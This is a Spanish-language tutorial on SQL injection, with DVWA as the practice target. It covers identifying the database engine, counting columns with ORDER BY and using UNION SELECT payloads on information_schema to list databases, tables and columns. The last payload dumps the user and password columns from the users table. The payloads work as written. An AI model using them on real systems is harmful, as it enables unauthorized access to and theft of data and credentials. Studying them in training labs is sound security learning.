EXTRACCIÓN DE INFORMACIÓN.
Extrayendo información despues de obtener acceso a la base de datos.
DETECTANDO GESTOR DE BASE DE DATOS
1. Utilizar herramientas como NMAP o similares
Puerto 3306 MySQL por defecto
2. Utilizar TABLA DE CONCATENACION:
GESTOR
'a' || 'b'
'a' + 'b'
concat('a','b')
Oracle
'ab'
ERROR
'ab'
PostgreSQL
'ab'
ERROR
ERROR
MySQL
0
'ab'
'ab'
SQL Server
ERROR
'ab'
ERROR
Si introduce como input alguna de las siguientes concatenaciones, sabrá que GESTOR es mas posible que sea en funcion del resultado obtenido.
Tambien puede utilizar:
@@Version → Para MySQL y MsSQL
Version() → PostgreSQL y MySQL
banner FROM v$version → Oracle
DETERMINANDO CANTIDAD DE COLUMNAS
El metodo variara en caso de que la inyeccion sea Integer o String:
1. INTEGER
Primero debo comprobar que la web es vulnerable a SQL Injection.
En este caso, utilizo -1 en vez de (') por ser inyección de integer.
Despues utilizo -1 ORDER BY 5 -- - Para ordenar las columnas de 5 en 5.
Continuo con -1 ORDER BY 10 -- - Y resulta que me da error al no encontrar la columna numero 10.
Intento con -1 ORDER BY 8 -- - Y no me da error.
En cambio con -1 ORDER BY 9 -- - Si que da error.
Por lo tanto, el numero de columnas es exactamente 8.
Por ultimo, para comprobar hago -1 UNION SELECT 1,2,3,4,5,6,7,8 -- - Y no me da ningun error.
2. CADENA
Primero debo comprobar con (') que la web es vulnerable a SQL Injection.
Despues utilizo ' ORDER BY 5 -- - Para ordenar las columnas de 5 en 5.
Continuo con ' ORDER BY 10 -- - Y resulta que me da error al no encontrar la columna numero 10.
Intento con ' ORDER BY 8 -- - Y no me da error.
En cambio con ' ORDER BY 9 -- - Si que da error.
Por lo tanto, el numero de columnas es exactamente 8.
Por ultimo, para comprobar hago ' UNION SELECT 1,2,3,4,5,6,7,8 -- - Y no me da ningun error.
DETERMINANDO NOMBRE DE LA BASE DE DATOS / TABLAS / COLUMNAS
1. Lo primero como ya hemos visto es comprobar que es vulnerable (')
2. Despues compruebo el numero de columnas con ORDER BY como en el punto anterior.
3. Utilizo ' UNION SELECT 1,2 -- - para comprobar y si no me da error, esta correcto.
4. Ahora puedo cambiar 1 y 2 por otro tipo de informaciones sacadas de la tabla:
' UNION SELECT @@version,2 -- - → muestra la version donde deberia estar el valor de 1.
' UNION SELECT table_schema,2 FROM information_schema.schemata -- - → muestra los nombres de las bases de datos.
' UNION SELECT table_schema,table_name FROM information_schema.tables -- - → muestra el nombre de las tablas y a que Base de datos pertenece.
' UNION SELECT table_name,column_name FROM information_schema.columns -- - → muestra el nombre de las tablas y las columnas que le pertenecen.
FILTRANDO DATOS DE SALIDA PARA OPTIMIZAR
Ya sabemos como extraer mucha informacion de la base de datos, pero, en ocasiones, se da el caso de que la web solo nos ofrece una pieza de informacion. O por el contrario, nos ofrece toda la informacion posible. Es por eso que tengo que saber como filtrar la informacion.
1. Compruebo que base de datos quiero atacar.
' UNION SELECT table_schema,2 FROM information_schema.tables -- -
Asi obtengo los nombres de las bases de datos y elijo la que yo quiero atacar.
2. Ahora, para obtener las tablas de esta base de datos tengo que filtrar:
‘ UNION SELECT table_name,2 FROM information_schema.tables WHERE table_schema=’dvwa' -- -
Ahora solo veo las tablas de la Base de datos “dvwa” por lo que puedo elegir la tabla que quiero atacar.
3. Seguimos para obtener las columnas de la tabla “users”
‘ UNION SELECT column_name,2 FROM information_schema.columns WHERE table_schema=’dvwa' AND table_name='users' -- -
Ya obtengo las columnas dentro de la tabla users de la base de datos dvwa. Ya solo queda sacar la informacion de las columnas.
Si solo puedo ver un dato al mismo tiempo, debo empezar a concatenar AND y != para ir navegando por cada una de las Bases de Datos, Luego tablas, luego columnas y por ultimo datos.
' UNION SELECT table_schema,2 FROM information_schema.tables WHERE table_schema!=dvwa AND table_schema!=fonts -- -
Asi, filtrando poco a poco vamos obteniendo la informacion que queremos.
EXTRAER TODOS LOS DATOS DE UNA BASE DE DATOS
Ya hemos conseguido alcanzar la COLUMNA de la TABLA de la BASE DE DATOS que nos interesa. Ahora necesitamos sacar la informacion de esta columna:
' UNION SELECT user,password FROM users -- -
Como ya sabemos la tabla de la que queremos sacar la informacion, no hace falta nada mas.
EXTRAER INFORMACION CON METODO POST
En todos los casos anteriores hemos utilizado el metodo GET, es decir, modificando el URL.
El metodo POST no me permite mostrar ni modificar los datos en el URL,
Para hacer las consultas con el metodo POST necesito una herramienta como BURP SUITE para modificar la solicitud POST en caliente antes de la transmision.
El procedimiento para obtener la informacion seria el mismo.
Última actualización